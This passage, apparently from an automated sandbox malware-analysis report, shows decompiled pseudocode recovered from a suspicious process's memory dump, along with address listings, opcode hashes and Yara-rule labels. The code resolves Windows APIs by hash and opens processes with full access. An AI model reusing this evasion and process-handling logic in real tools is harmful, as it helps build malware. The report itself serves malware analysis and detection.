					}
					if(E003C9650(_t376 + 0x64) >> 2 > 0) {
						 *((intOrPtr*)(_t376 + 0x74)) = _t358;
						_t351 = 0;
						 *(_t376 + 0x40) = _t237;
						do {
							_t242 = _t351 * 4;
							_t362 = E003C9640(_t376 + 0x68, _t242);
							_t336 = E003C9650(_t370) >> 2;
							if(_t336 <= 0) {
								L22:
								_t363 = E003B15C0(0xa1310f65, 0x80eeda84);
								if(_t363 != 0) {
									_t364 =  *_t363(0x1fffff, 0,  *((intOrPtr*)(E003C9640(_t376 + 0x68, _t242))));
									if(_t364 != 0) {
										E003C9670( *((intOrPtr*)(_t376 + 0x78)), E003C9650( *((intOrPtr*)(_t376 + 0x74))) + 4);
										 *((intOrPtr*)(E003C9640( *((intOrPtr*)(_t376 + 0x78)), E003C9650( *((intOrPtr*)(_t376 + 0x74))) + 0xfffffffc))) = _t364;
										_t194 = E003C9640(_t376 + 0x68, _t242);
										E003C9670(_t370, E003C9650(_t370) + 4);
										 *((intOrPtr*)(E003C9640(_t370, E003C9650(_t370) + 0xfffffffc))) =  *_t194;
									}
								}
							} else {
								 *(_t376 + 0x38) = _t242;
								_t245 = 0;
								 *(_t376 + 0x34) = _t351;
								_t352 = _t362;
								_t365 = _t336;
								while( *((intOrPtr*)(E003C9640(_t370, _t245 * 4))) !=  *_t352) {
									_t245 = _t245 + 1;
									if(_t245 < _t365) {
										continue;
									} else {
										_t242 =  *(_t376 + 0x38);
										_t351 =  *(_t376 + 0x34);
										goto L22;
									}
									goto L25;
								}
								_t242 =  *(_t376 + 0x38);
								_t351 =  *(_t376 + 0x34);
								if(_t245 == 0xffffffff) {
									goto L22;
								} else {
									goto L25;
								}
								goto L65;
							}
							L25:
							_t351 = _t351 + 1;
						} while (_t351 < E003C9650(_t376 + 0x64) >> 2);
						_t358 =  *((intOrPtr*)(_t376 + 0x74));
						_t237 =  *(_t376 + 0x40);
					}
					E003C9510(_t376 + 0x64);
					if( *((intOrPtr*)(_t237 + 0x28)) != 0) {
						_t145 = E003C9650(_t370) >> 2;
						if(_t145 > 0) {
							 *(_t376 + 0x34) = _t145;
							_t347 = 0;
							 *((intOrPtr*)(_t376 + 0x74)) = _t358;
							while(1) {
								_t361 = _t347 * 4;
								if( *((intOrPtr*)(E003C9640(_t370, _t361))) ==  *((intOrPtr*)(_t237 + 0x2c))) {
									break;
								}
								_t347 = _t347 + 1;
								if(_t347 <  *(_t376 + 0x34)) {
									continue;
								} else {
									_t358 =  *((intOrPtr*)(_t376 + 0x74));
								}
								goto L33;
							}
							 *(_t376 + 0x40) = _t361;
							_t358 =  *((intOrPtr*)(_t376 + 0x74));
							if(_t347 != 0xffffffff) {
								if(E003C9650(_t358) >  *(_t376 + 0x40)) {
									 *((intOrPtr*)(_t376 + 0x3c)) = 4 + _t347 * 4;
									if(E003C9650(_t358) >  *((intOrPtr*)(_t376 + 0x3c))) {
										 *(_t376 + 0x38) = E003C9640(_t358,  *(_t376 + 0x40));
										 *(_t376 + 0x34) = E003C9640(_t358,  *((intOrPtr*)(_t376 + 0x3c)));
										E003B0BC0( *(_t376 + 0x40),  *(_t376 + 0x38), E003C9650(_t358) -  *((intOrPtr*)(_t376 + 0x3c)));
										_t376 = _t376 + 0xc;
									}
									E003C9670(_t358, E003C9650(_t358) + 0xfffffffc);
								}
								if(E003C9650(_t370) >  *(_t376 + 0x40)) {
									_t348 = 4 + _t347 * 4;
									if(E003C9650(_t370) > 4 + _t347 * 4) {
										 *(_t376 + 0x34) = E003C9640(_t370,  *(_t376 + 0x40));
										 *(_t376 + 0x38) = E003C9640(_t370, _t348);
										E003B0BC0( *((intOrPtr*)(_t376 + 0x3c)),  *((intOrPtr*)(_t376 + 0x3c)), E003C9650(_t370) - _t348);
										_t376 = _t376 + 0xc;
									}
									E003C9670(_t370, E003C9650(_t370) + 0xfffffffc);
								}
								E003C9670(_t358, E003C9650(_t358) + 4);
								 *((intOrPtr*)(E003C9640(_t358, E003C9650(_t358) + 0xfffffffc))) =  *((intOrPtr*)(_t237 + 0x28));
								E003C9670(_t370, E003C9650(_t370) + 4);
								 *((intOrPtr*)(E003C9640(_t370, E003C9650(_t370) + 0xfffffffc))) =  *((intOrPtr*)(_t237 + 0x2c));
							}
						}
					}
					goto L33;
				}
				L65:
			}

0x003aca14
0x003aca17
0x003aca24
0x003aca34
0x003ad14a
0x003ad155
0x003ad168
0x003aca3a
0x003aca3a
0x003aca3f
0x003aca47
0x003aca4c
0x003aca52
0x003aca56
0x003aca58
0x003aca5c
0x003aca5e
0x003aca6b
0x003aca78
0x003aca7d
0x003acab7
0x003acac0
0x003ad0d7
0x003ad0e5
0x003ad106
0x003ad112
0x003ad128
0x003ad12d
0x003ad12d
0x003ad0f4
0x003ad0f4
0x003acad5
0x003acad9
0x003acae7
0x003acae7
0x003acaf4
0x003ad075
0x003ad083
0x003ad0a5
0x003ad0b6
0x003ad0cb
0x003ad0d0
0x003ad0d0
0x003ad096
0x003ad096
0x003acafa
0x003aca7f
0x003aca81
0x003aca85
0x003aca87
0x003aca8b
0x003aca8d
0x003aca8f
0x003acaaa
0x003acaad
0x00000000
0x003acaaf
0x003acaaf
0x003acab3
0x00000000
0x003acab3
0x00000000
0x003acaad
0x003ad134
0x003ad138
0x003ad13f
0x00000000
0x003ad145
0x00000000
0x003ad145
0x003acc88
0x003acc8a
0x003acc8e
0x003acc93
0x003acc9a
0x003acc9e
0x003acca4
0x003accb2
0x003accbd
0x003accc2
0x003ace64
0x003ace68
0x003acea5
0x00000000
0x003ace6a
0x003ace73
0x003ace7d
0x003ace94
0x003ace99
0x00000000
0x003acea3
0x003acea7
0x003aceb7
0x003acec5
0x003acec8
0x003acecd
0x003aced0
0x003aced9
0x003acee9
0x003acee9
0x003ace99
0x003accc8
0x003accc8
0x003accce
0x003accd2
0x003accd4
0x003accd6
0x003acce8
0x003accef
0x003aceea
0x003aceee
0x003acef7
0x003acf0a
0x003accf5
0x003accf7
0x003accf8
0x003accf9
0x003accfb
0x003accfc
0x003accfd
0x003accfd
0x003accef
0x00000000
0x003accc2
0x003acafb
0x003acafd
0x003acb06
0x003acb0e
0x003acb12
0x003acb12
0x003acb24
0x003acb2a
0x003acb2e
0x003acb30
0x003acb34
0x003acb34
0x003acb45
0x003acb50
0x003acb55
0x003acb8d
0x003acb9c
0x003acba0
0x003acbb7
0x003acbbb
0x003acbce
0x003acbea
0x003acbf0
0x003acc04
0x003acc1d
0x003acc1d
0x003acbbb
0x003acb57
0x003acb59
0x003acb5d
0x003acb5f
0x003acb63
0x003acb65
0x003acb67
0x003acb80
0x003acb83
0x00000000
0x003acb85
0x003acb85
0x003acb89
0x00000000
0x003acb89
0x00000000
0x003acb83
0x003ad05b
0x003ad05f
0x003ad066
0x00000000
0x003ad06c
0x00000000
0x003ad06c
0x00000000
0x003ad066
0x003acc1f
0x003acc1f
0x003acc2c
0x003acc34
0x003acc38
0x003acc38
0x003acc40
0x003acc49
0x003acc52
0x003acc57
0x003acc59
0x003acc5d
0x003acc5f
0x003acc63
0x003acc65
0x003acc77
0x00000000
0x00000000
0x003acc7d
0x003acc82
0x00000000
0x003acc84
0x003acc84
0x003acc84
0x00000000
0x003acc82
0x003acf0b
0x003acf0f
0x003acf16
0x003acf27
0x003acff7
0x003ad004
0x003ad028
0x003ad037
0x003ad04f
0x003ad054
0x003ad054
0x003ad013
0x003ad013
0x003acf38
0x003acf93
0x003acfa1
0x003acfc2
0x003acfce
0x003acfe4
0x003acfe9
0x003acfe9
0x003acfb0
0x003acfb0
0x003acf47
0x003acf63
0x003acf70
0x003acf8a
0x003acf8a
0x003acf16
0x003acc57
0x00000000
0x003acc49
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dadf6844ec3758e03c6f7083a9cc0081a3faab2b917400b9af9415339571736d
Instruction ID: c3bceabdd4834d7a5fc1a70acfec96793a9d2b79bd548171131da235b0c0e3f6
Opcode Fuzzy Hash: dadf6844ec3758e03c6f7083a9cc0081a3faab2b917400b9af9415339571736d
Instruction Fuzzy Hash: 4EF180716042149BC716EF28C896B2E77E6EFC6760F12052EF596CB2E2DA30DC15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003AF9A0, Relevance: .5, Instructions: 473
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E003AF9A0(signed int __ecx, signed int __edx, void* __eflags) {
				void* __ebx;
				void* __ebp;
				unsigned int _t103;
				signed int _t113;
				unsigned int _t123;
				void* _t124;
				void* _t129;
				unsigned int _t131;
				intOrPtr* _t179;
				void* _t206;
				signed int _t222;
				signed int _t224;
				signed int _t227;
				unsigned int _t309;
				unsigned int _t311;
				signed int _t321;
				signed int _t325;
				intOrPtr* _t326;
				signed int _t327;
				void* _t328;
				intOrPtr* _t329;
				intOrPtr* _t333;
				signed int _t334;
				signed int _t338;
				intOrPtr* _t339;
				intOrPtr* _t340;
				intOrPtr _t341;
				unsigned int _t342;
				signed int _t343;
				signed int _t347;
				unsigned int _t350;
				signed int _t351;
				signed int _t354;
				intOrPtr* _t355;
				intOrPtr* _t357;
				unsigned int _t359;
				void* _t360;
				signed int* _t361;

				_t361 = _t360 - 0x48;
				_t222 = __ecx;
				_t331 = __edx;
				E003AE3A0( &(_t361[0xc]), __edx, 0x7fffffff);
				if(E003C9660( &(_t361[0xb])) != 0) {
					 *(_t222 + 0x24) = 0;
					E003C9510( &(_t361[0xb]));
					return 0xffffffff;
				} else {
					_t103 = E003C9650(_t222);
					_t347 = _t222 + 0x14;
					if(_t103 >> 2 > 0) {
						_t361[0x10] = _t347;
						_t327 = 0;
						_t361[4] = __edx;
						do {
							_t343 = _t327 * 4;
							_t355 = E003C9640(_t222, _t343);
							_t311 = E003C9650( &(_t361[0xb])) >> 2;
							if(_t311 <= 0) {
								L8:
								if(E003C9650(_t222) > _t343) {
									_t356 = 4 + _t327 * 4;
									if(E003C9650(_t222) > 4 + _t327 * 4) {
										_t361[1] = E003C9640(_t222, _t343);
										 *_t361 = E003C9640(_t222, _t356);
										E003B0BC0(_t361[3], _t361[1], E003C9650(_t222) - _t356);
										_t361 =  &(_t361[3]);
									}
									E003C9670(_t222, E003C9650(_t222) + 0xfffffffc);
								}
								_t357 = E003B15C0(0x588ab3ea, 0x35b39b2b);
								if(_t357 != 0) {
									 *_t357( *((intOrPtr*)(E003C9640(_t361[0x11], _t343))));
								}
								if(E003C9650(_t361[0x10]) > _t343) {
									_t358 = 4 + _t327 * 4;
									if(E003C9650(_t361[0x10]) > 4 + _t327 * 4) {
										_t206 = E003C9640(_t361[0x11], _t343);
										_t361[2] = E003C9640(_t361[0x11], _t358);
										E003B0BC0(_t206, _t361[3], E003C9650(_t361[0x10]) - _t358);
										_t361 =  &(_t361[3]);
									}
									E003C9670(_t361[0x11], E003C9650(_t361[0x10]) + 0xfffffffc);
								}
								_t328 = _t327 - 1;
							} else {
								_t361[3] = _t327;
								_t329 = _t355;
								_t361[0xf] = _t222;
								_t227 = 0;
								_t359 = _t311;
								while( *((intOrPtr*)(E003C9640( &(_t361[0xc]), _t227 * 4))) !=  *_t329) {
									_t227 = _t227 + 1;
									if(_t227 < _t359) {
										continue;
									} else {
										_t327 = _t361[3];
										_t222 = _t361[0xf];
										goto L8;
									}
									goto L13;
								}
								_t327 = _t361[3];
								_t222 = _t361[0xf];
								if(_t227 == 0xffffffff) {
									goto L8;
								} else {
									goto L13;
								}
								L33:
								 *_t361 = 0;
								_push(0);
								E003C9350( &(_t361[2]));
								_t361[5] = _t331;
								_push(0);
								E003C9350( &(_t361[7]));
								_t113 =  <  ? E003C9650(_t347) >> 2 : 0x40;
								if(0x40 <= 0) {
									_t333 = E003B15C0(0xa1310f65, 0x813508bf);
									if(_t333 == 0) {
										_t334 = 0;
										goto L42;
									} else {
										_t123 = E003C9650( &(_t361[1]));
										_t124 = E003C9640( &(_t361[2]), 0);
										_t334 =  *_t333(_t123 >> 2, _t124, 0, 0x3e8);
										if(_t334 == 0xffffffff || _t334 == 0x102) {
											goto L43;
										} else {
											L42:
											 *(_t222 + 0x24) =  *(E003C9640(_t347, _t334 << 2));
											 *((intOrPtr*)(_t222 + 0x28)) =  *((intOrPtr*)(E003C9640(_t222, _t334 << 2)));
											_t224 =  *(_t222 + 0x24);
											E003AE2F0(_t224,  &(_t361[5]), _t347);
											E003AE2F0(_t224, _t361, _t347);
											return _t224;
										}
									}
								} else {
									_t361[0x10] = _t347;
									_t361[0xf] = _t222;
									_t222 = _t113;
									_t361[0xa] = 0;
									_t129 = E003B15C0(0xa1310f65, 0x2a01082);
									if(_t129 == 0) {
										L43:
										E003AE2F0(_t222,  &(_t361[5]), _t347);
										E003AE2F0(_t222, _t361, _t347);
										return 0xffffffff;
									} else {
										_push(0);
										_push(0);
										_push(1);
										_push(0);
										asm("int3");
										return _t129;
									}
								}
								goto L65;
							}
							L13:
							_t327 = _t328 + 1;
						} while (_t327 < E003C9650(_t222) >> 2);
						_t347 = _t361[0x10];
						_t331 = _t361[4];
					}
					if(E003C9650( &(_t361[0xb])) >> 2 > 0) {
						_t361[0x10] = _t347;
						_t325 = 0;
						_t361[4] = _t331;
						do {
							_t351 = _t325 * 4;
							_t339 = E003C9640( &(_t361[0xc]), _t351);
							_t309 = E003C9650(_t222) >> 2;
							if(_t309 <= 0) {
								L22:
								_t340 = E003B15C0(0xa1310f65, 0x80eeda84);
								if(_t340 != 0) {
									_t341 =  *_t340(0x1fffff, 0,  *((intOrPtr*)(E003C9640( &(_t361[0xc]), _t351))));
									if(_t341 != 0) {
										E003C9670(_t361[0x11], E003C9650(_t361[0x10]) + 4);
										 *((intOrPtr*)(E003C9640(_t361[0x11], E003C9650(_t361[0x10]) + 0xfffffffc))) = _t341;
										_t179 = E003C9640( &(_t361[0xc]), _t351);
										E003C9670(_t222, E003C9650(_t222) + 4);
										 *((intOrPtr*)(E003C9640(_t222, E003C9650(_t222) + 0xfffffffc))) =  *_t179;
									}
								}
							} else {
								_t361[1] = _t351;
								_t354 = 0;
								 *_t361 = _t325;
								_t326 = _t339;
								_t342 = _t309;
								while( *((intOrPtr*)(E003C9640(_t222, _t354 * 4))) !=  *_t326) {
									_t354 = _t354 + 1;
									if(_t354 < _t342) {
										continue;
									} else {
										_t351 = _t361[1];
										_t325 =  *_t361;
										goto L22;
									}
									goto L25;
								}
								_t351 = _t361[1];
								_t325 =  *_t361;
								if(_t354 == 0xffffffff) {
									goto L22;
								} else {
									goto L25;
								}
								goto L65;
							}
							L25:
							_t325 = _t325 + 1;
						} while (_t325 < E003C9650( &(_t361[0xb])) >> 2);
						_t347 = _t361[0x10];
						_t331 = _t361[4];
					}
					E003C9510( &(_t361[0xb]));
					if( *(_t222 + 0x24) != 0) {
						_t131 = E003C9650(_t222) >> 2;
						if(_t131 > 0) {
							_t361[0x10] = _t347;
							_t321 = 0;
							_t361[4] = _t331;
							_t350 = _t131;
							while(1) {
								_t338 = _t321 * 4;
								if( *((intOrPtr*)(E003C9640(_t222, _t338))) ==  *((intOrPtr*)(_t222 + 0x28))) {
									break;
								}
								_t321 = _t321 + 1;
								if(_t321 < _t350) {
									continue;
								} else {
									_t347 = _t361[0x10];
									_t331 = _t361[4];
								}
								goto L33;
							}
							_t361[3] = _t338;
							_t347 = _t361[0x10];
							_t331 = _t361[4];
							if(_t321 != 0xffffffff) {
								if(E003C9650(_t347) > _t361[3]) {
									_t361[2] = 4 + _t321 * 4;
									if(E003C9650(_t347) > _t361[2]) {
										_t361[1] = E003C9640(_t347, _t361[3]);
										 *_t361 = E003C9640(_t347, _t361[2]);
										E003B0BC0(_t361[3], _t361[1], E003C9650(_t347) - _t361[2]);
										_t361 =  &(_t361[3]);
									}
									E003C9670(_t347, E003C9650(_t347) + 0xfffffffc);
								}
								if(E003C9650(_t222) > _t361[3]) {
									_t322 = 4 + _t321 * 4;
									if(E003C9650(_t222) > 4 + _t321 * 4) {
										_t361[1] = E003C9640(_t222, _t361[3]);
										 *_t361 = E003C9640(_t222, _t322);
										E003B0BC0(_t361[3], _t361[1], E003C9650(_t222) - _t322);
										_t361 =  &(_t361[3]);
									}
									E003C9670(_t222, E003C9650(_t222) + 0xfffffffc);
								}
								E003C9670(_t347, E003C9650(_t347) + 4);
								 *(E003C9640(_t347, E003C9650(_t347) + 0xfffffffc)) =  *(_t222 + 0x24);
								E003C9670(_t222, E003C9650(_t222) + 4);
								 *((intOrPtr*)(E003C9640(_t222, E003C9650(_t222) + 0xfffffffc))) =  *((intOrPtr*)(_t222 + 0x28));
							}
						}
					}
					goto L33;
				}
				L65:
			}

0x003af9a4
0x003af9a7
0x003af9ae
0x003af9b4
0x003af9c4
0x003b0094
0x003b009f
0x003b00b0
0x003af9ca
0x003af9cc
0x003af9d4
0x003af9d9
0x003af9df
0x003af9e3
0x003af9e5
0x003af9e9
0x003af9eb
0x003af9f8
0x003afa05
0x003afa0a
0x003afa44
0x003afa4d
0x003b0022
0x003b0030
0x003b0051
0x003b005d
0x003b0072
0x003b0077
0x003b0077
0x003b003f
0x003b003f
0x003afa62
0x003afa66
0x003afa74
0x003afa74
0x003afa81
0x003affc0
0x003affce
0x003afff0
0x003b0001
0x003b0016
0x003b001b
0x003b001b
0x003affe1
0x003affe1
0x003afa87
0x003afa0c
0x003afa0e
0x003afa12
0x003afa14
0x003afa18
0x003afa1a
0x003afa1c
0x003afa37
0x003afa3a
0x00000000
0x003afa3c
0x003afa3c
0x003afa40
0x00000000
0x003afa40
0x00000000
0x003afa3a
0x003b007e
0x003b0082
0x003b0089
0x00000000
0x003b008f
0x00000000
0x003b008f
0x003afc18
0x003afc1a
0x003afc1d
0x003afc22
0x003afc27
0x003afc2b
0x003afc31
0x003afc4a
0x003afc4f
0x003afdbd
0x003afdc1
0x003afdfa
0x00000000
0x003afdc3
0x003afdc7
0x003afdd4
0x003afde7
0x003afdec
0x00000000
0x003afdf6
0x003afdfc
0x003afe0c
0x003afe1a
0x003afe1d
0x003afe20
0x003afe28
0x003afe36
0x003afe36
0x003afdec
0x003afc55
0x003afc55
0x003afc5b
0x003afc5f
0x003afc61
0x003afc73
0x003afc7a
0x003afe37
0x003afe3b
0x003afe43
0x003afe54
0x003afc80
0x003afc82
0x003afc83
0x003afc84
0x003afc86
0x003afc87
0x003afc88
0x003afc88
0x003afc7a
0x00000000
0x003afc4f
0x003afa88
0x003afa8a
0x003afa93
0x003afa9b
0x003afa9f
0x003afa9f
0x003afab1
0x003afab7
0x003afabb
0x003afabd
0x003afac1
0x003afac1
0x003afad2
0x003afadd
0x003afae2
0x003afb18
0x003afb27
0x003afb2b
0x003afb42
0x003afb46
0x003afb59
0x003afb75
0x003afb7b
0x003afb8f
0x003afba9
0x003afba9
0x003afb46
0x003afae4
0x003afae6
0x003afaea
0x003afaec
0x003afaef
0x003afaf1
0x003afaf3
0x003afb0c
0x003afb0f
0x00000000
0x003afb11
0x003afb11
0x003afb15
0x00000000
0x003afb15
0x00000000
0x003afb0f
0x003affa7
0x003affab
0x003affb1
0x00000000
0x003affb7
0x00000000
0x003affb7
0x00000000
0x003affb1
0x003afbab
0x003afbab
0x003afbb8
0x003afbc0
0x003afbc4
0x003afbc4
0x003afbcc
0x003afbd5
0x003afbde
0x003afbe3
0x003afbe5
0x003afbe9
0x003afbeb
0x003afbef
0x003afbf1
0x003afbf3
0x003afc05
0x00000000
0x00000000
0x003afc0b
0x003afc0e
0x00000000
0x003afc10
0x003afc10
0x003afc14
0x003afc14
0x00000000
0x003afc0e
0x003afe55
0x003afe59
0x003afe5d
0x003afe64
0x003afe75
0x003aff44
0x003aff51
0x003aff75
0x003aff84
0x003aff9b
0x003affa0
0x003affa0
0x003aff60
0x003aff60
0x003afe86
0x003afee1
0x003afeef
0x003aff10
0x003aff1c
0x003aff31
0x003aff36
0x003aff36
0x003afefe
0x003afefe
0x003afe95
0x003afeb1
0x003afebe
0x003afed8
0x003afed8
0x003afe64
0x003afbe3
0x00000000
0x003afbd5
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d660f56c1f9ece7688e948068c834f38dca591276ed273b3e8a330a8d68dc6fd
Instruction ID: 2c2f2e53e2490321d752a550335b6201e2e783afcf28cd68ac82b6d0f3c224a8
Opcode Fuzzy Hash: d660f56c1f9ece7688e948068c834f38dca591276ed273b3e8a330a8d68dc6fd
Instruction Fuzzy Hash: 9FF18F716042049FC716BF64C896B6E73A5EF86324F124A3EF59ACB2D2DA30DC15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003CD620, Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e73013a123925009c38bbb2a8ebeceecdbbb30f2f06d2f932ef995164901b1d
Instruction ID: 05ab5506e6d8f313b95deed9d7621d893ffd6a6d5a15136d8e1fc802c235ee2b
Opcode Fuzzy Hash: 8e73013a123925009c38bbb2a8ebeceecdbbb30f2f06d2f932ef995164901b1d
Instruction Fuzzy Hash: 3EE1F22EE39FD909E313853AA4037B7B7484FF72C8F02D72BB48471D92DB6556926248

Uniqueness

Uniqueness Score: -1.00%

Function 003BF6E0, Relevance: .4, Instructions: 392
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003BF6E0(signed int* __ecx, unsigned int _a4) {
				short _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t95;
				signed int _t96;
				signed int _t102;
				signed int _t103;
				signed int* _t104;
				signed int _t109;
				signed int _t120;
				signed int _t122;
				unsigned int _t124;
				signed int _t126;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				void* _t132;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				unsigned int _t143;
				signed int _t144;
				signed short* _t146;
				signed int _t147;
				signed int _t149;
				signed int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				signed int _t161;
				signed short* _t163;
				signed int _t165;
				void* _t173;
				signed int _t175;
				signed int _t176;
				signed short* _t179;
				signed int _t181;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				unsigned int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed short* _t204;
				signed int _t212;
				signed int _t213;
				void* _t215;

				_t215 = (_t213 & 0xfffffff0) - 0x14;
				asm("movsd xmm0, [0x3da240]");
				asm("movsd [esp+0x8], xmm0");
				_v20 =  *0x3da248 & 0x0000ffff;
				_t136 =  *__ecx;
				if(_t136 == 0) {
					_t159 = 0;
					_t95 = 0;
				} else {
					_t131 = _t136 & 0x0000000f;
					if(_t131 == 0) {
						L6:
						asm("pxor xmm0, xmm0");
						_t120 =  ~( ~_t131 + 0x00000007 & 0x00000007) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [ecx+ebx*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb edx, xmm1");
							if(_t158 != 0) {
								break;
							}
							_t131 = _t131 + 8;
							if(_t131 < _t120) {
								continue;
							} else {
								if(_t120 >= 0x7fffffff) {
									goto L12;
								} else {
									goto L10;
								}
							}
							goto L19;
						}
						asm("bsf eax, edx");
						_t95 = (_t120 >> 1) + _t131;
						goto L98;
					} else {
						_t120 = 0;
						if((_t131 & 0x00000001) != 0) {
							L10:
							while(( *(_t136 + _t120 * 2) & 0x0000ffff) != 0) {
								_t120 = _t120 + 1;
								if(_t120 < 0x7fffffff) {
									continue;
								} else {
									L12:
									_t95 = 0x7fffffff;
									goto L13;
								}
								goto L19;
							}
							goto L98;
						} else {
							_t131 =  ~_t131 + 0x10 >> 1;
							while(1) {
								_t158 =  *(_t136 + _t120 * 2) & 0x0000ffff;
								if(_t158 == 0) {
									break;
								}
								_t120 = _t120 + 1;
								if(_t120 < _t131) {
									continue;
								} else {
									goto L6;
								}
								goto L19;
							}
							L98:
							if(_t95 > 0) {
								L13:
								_t159 = 0;
								_t212 = _v28 & 0x0000ffff;
								_t132 = 0;
								_v36 = _t95;
								while(_t212 != 0) {
									_t122 =  *(_t136 + _t159 * 2) & 0x0000ffff;
									_t200 = 0;
									_v32 = _t136;
									while(_t122 != ( *(_t215 + 8 + _t200 * 2) & 0x0000ffff)) {
										_t200 = _t200 + 1;
										if(( *(_t215 + 8 + _t200 * 2) & 0x0000ffff) != 0) {
											continue;
										} else {
											_t95 = _v36;
											_t136 = _v32;
										}
										goto L19;
									}
									_t132 = _t132 + 1;
									_t159 = _t159 + 1;
									_t136 = _v32;
									if(_t132 < _v36) {
										continue;
									} else {
										break;
									}
									goto L97;
								}
								_t95 = _v36;
							} else {
								_t159 = 0;
							}
							goto L19;
							L97:
							return _t124;
							L111:
						}
					}
				}
				L19:
				_t96 = _t95 - 1;
				_t203 = _t95 - _t159;
				if(_t96 >= _t159) {
					_t129 = _v28 & 0x0000ffff;
					_v36 = _t159;
					while(_t129 != 0) {
						_t181 =  *(_t136 + _t96 * 2) & 0x0000ffff;
						_t199 = 0;
						_v32 = _t136;
						while(_t181 != ( *(_t215 + 8 + _t199 * 2) & 0x0000ffff)) {
							_t199 = _t199 + 1;
							if(( *(_t215 + 8 + _t199 * 2) & 0x0000ffff) != 0) {
								continue;
							} else {
								_t159 = _v36;
								_t136 = _v32;
							}
							goto L26;
						}
						_t96 = _t96 - 1;
						_t203 = _t203 - 1;
						_t136 = _v32;
						if(_t96 >= _v36) {
							continue;
						} else {
							break;
						}
						goto L111;
					}
					_t159 = _v36;
				}
				L26:
				_t124 = _a4;
				if(_t203 != 0) {
					if(_t136 == 0) {
						_t184 = 0;
					} else {
						_t109 = _t136 & 0x0000000f;
						if(_t109 == 0) {
							L42:
							asm("pxor xmm0, xmm0");
							_t184 =  ~( ~_t109 + 0x00000007 & 0x00000007) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [ecx+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ebx, xmm1");
								if(_t124 != 0) {
									break;
								}
								_t109 = _t109 + 8;
								if(_t109 < _t184) {
									continue;
								} else {
									_t124 = _a4;
									if(_t184 >= 0x7fffffff) {
										goto L48;
									} else {
										goto L46;
									}
								}
								goto L49;
							}
							asm("bsf edi, edi");
							_t196 = _t124 >> 1;
							_t124 = _a4;
							_t184 = _t196 + _t109;
						} else {
							_t184 = 0;
							if((_t109 & 0x00000001) != 0) {
								L46:
								while(( *(_t136 + _t184 * 2) & 0x0000ffff) != 0) {
									_t184 = _t184 + 1;
									if(_t184 < 0x7fffffff) {
										continue;
									} else {
										L48:
										_t184 = 0x7fffffff;
									}
									goto L49;
								}
							} else {
								_t109 =  ~_t109 + 0x10 >> 1;
								while(( *(_t136 + _t184 * 2) & 0x0000ffff) != 0) {
									_t184 = _t184 + 1;
									if(_t184 < _t109) {
										continue;
									} else {
										_t124 = _a4;
										goto L42;
									}
									goto L49;
								}
								_t124 = _a4;
							}
						}
					}
					L49:
					_t160 =  <=  ? 0 : _t159;
					_t161 =  <  ? _t184 :  <=  ? 0 : _t159;
					_t185 = _t184 - _t161;
					if(_t203 < 0 || _t203 > _t185) {
						_t203 = _t185;
					}
					_t186 = _t136 + _t161 * 2;
					 *_t124 = 0;
					 *(_t124 + 4) = 0;
					if(_t186 == 0) {
						L88:
						_push(0x80);
						_t204 = E003B1030();
						_t215 = _t215 + 4;
						_t163 =  *_t124;
						if(_t163 == 0) {
							 *_t204 = 0;
						} else {
							if(_t204 != 0) {
								_t137 =  *_t163 & 0x0000ffff;
								 *_t204 = _t137;
								if(_t137 != 0) {
									_t138 = 0;
									while(1) {
										_t138 = _t138 + 1;
										_t188 =  *(_t163 + _t138 * 4 - 2) & 0x0000ffff;
										 *(_t204 + _t138 * 4 - 2) = _t188;
										if(_t188 == 0) {
											goto L94;
										}
										_t189 =  *(_t163 + _t138 * 4) & 0x0000ffff;
										 *(_t204 + _t138 * 4) = _t189;
										if(_t189 != 0) {
											continue;
										}
										goto L94;
									}
								}
							}
							L94:
							_push(2);
							_push(_t163);
							E003B10B0();
							_t215 = _t215 + 8;
						}
						goto L96;
					} else {
						_t165 =  *_t186 & 0x0000ffff;
						if(_t165 == 0) {
							goto L88;
						} else {
							if(_t203 == 0) {
								_t149 = _t186 & 0x0000000f;
								if(_t149 == 0) {
									L60:
									asm("pxor xmm0, xmm0");
									_t203 =  ~( ~_t149 + 0x00000007 & 0x00000007) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm1, [edi+ecx*2]");
										asm("pcmpeqw xmm1, xmm0");
										asm("pmovmskb edx, xmm1");
										if(_t165 != 0) {
											break;
										}
										_t149 = _t149 + 8;
										if(_t149 < _t203) {
											continue;
										} else {
											if(_t203 >= 0x7fffffff) {
												goto L66;
											} else {
												goto L64;
											}
										}
										goto L67;
									}
									asm("bsf esi, edx");
									_t203 = (_t203 >> 1) + _t149;
								} else {
									_t203 = 0;
									if((_t149 & 0x00000001) != 0) {
										L64:
										while(( *(_t186 + _t203 * 2) & 0x0000ffff) != 0) {
											_t203 = _t203 + 1;
											if(_t203 < 0x7fffffff) {
												continue;
											} else {
												L66:
												_t203 = 0x7fffffff;
											}
											goto L67;
										}
									} else {
										_t149 =  ~_t149 + 0x10 >> 1;
										while(1) {
											_t165 =  *(_t186 + _t203 * 2) & 0x0000ffff;
											if(_t165 == 0) {
												goto L67;
											}
											_t203 = _t203 + 1;
											if(_t203 < _t149) {
												continue;
											} else {
												goto L60;
											}
